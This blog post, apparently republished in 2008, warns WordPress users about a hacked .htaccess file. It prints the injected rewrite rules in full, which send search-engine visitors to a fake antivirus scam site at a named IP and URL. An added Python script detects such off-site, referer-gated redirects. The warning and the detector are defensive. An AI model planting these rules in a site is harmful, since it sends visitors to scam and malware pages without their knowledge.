08.28.08

Beware Of Wordpress .htaccess Hack

By Brian Turner

Just a quick heads up for anybody who may have any older Wordpress installs running to check their .htaccess file hasn't been hacked.

I had this happen to a major site a couple of weeks back, and a cursory look at some other sites found it occurring elsewhere.

In short, the original .htaccess file is replaced with one which redirects internal page requests to a Russian "check your PC security" site, which may also threaten to install malware.

It's a nasty little hack, and this is what I found on mine:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
    Errordocument 404 http://87.248.180.88/in.html?s=hg_err

The result was to send people to the following link: http://scan.power-antivirus-2009.com/?aff=1050

Ugly, nasty, and very annoying. Go check now if you need to.

About the Author: I'm a SEO & business consultant in the UK, specialising in SMEs and start-ups. I run Platinax Internet as a free resource for small business trying to get the best out of being online and offer internet management services from my main company, Britecorp. In my spare time I'm an aspiring science fiction and fantasy writer, and currently live with my family in the Highlands of Scotland.
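
A way to check for the pattern in the .htaccess shown above, as an added example that is not part of the original post: it flags `RewriteRule` and `ErrorDocument` targets that point off-site and notes when the redirect is gated on the referer, which is why the site looks normal when visited directly. The function name `audit_htaccess`, the `own_hosts` parameter and the sample rules (using the documentation address 192.0.2.10) are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample with the same structure as the injected rules.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://192.0.2.10/in.html?s=hg [R,L]
ErrorDocument 404 http://192.0.2.10/in.html?s=hg_err
"""

EXTERNAL = re.compile(r"^https?://", re.I)

def audit_htaccess(text, own_hosts=()):
    """Return (line_no, reason) findings for off-site redirects in .htaccess text."""
    own = {h.lower() for h in own_hosts}   # hosts the site legitimately redirects to
    findings, referer_cond = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()       # Apache directive names are case-insensitive
        target = parts[2] if len(parts) > 2 else ""
        host = urlparse(target).hostname if EXTERNAL.match(target) else None
        if directive == "rewritecond":
            # Conditions accumulate until the next RewriteRule consumes them.
            if len(parts) > 1 and "http_referer" in parts[1].lower():
                referer_cond = True
        elif directive == "rewriterule":
            if host and host not in own:
                why = "referer-gated" if referer_cond else "unconditional"
                findings.append((no, f"{why} redirect to {host}"))
            referer_cond = False
        elif directive == "errordocument":
            if host and host not in own:
                findings.append((no, f"ErrorDocument sends visitors to {host}"))
    return findings

if __name__ == "__main__":
    import sys
    # Usage: python audit_htaccess.py /path/to/site/.htaccess [more files...]
    for path in sys.argv[1:]:
        with open(path, errors="replace") as fh:
            for no, reason in audit_htaccess(fh.read()):
                print(f"{path}:{no}: {reason}")
```

Pass the site's own hostnames as `own_hosts` to suppress findings for legitimate absolute redirects, and compare any flagged file against a known-good copy before restoring it.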

-- SysAdminNews is an iEntry, Inc. publication --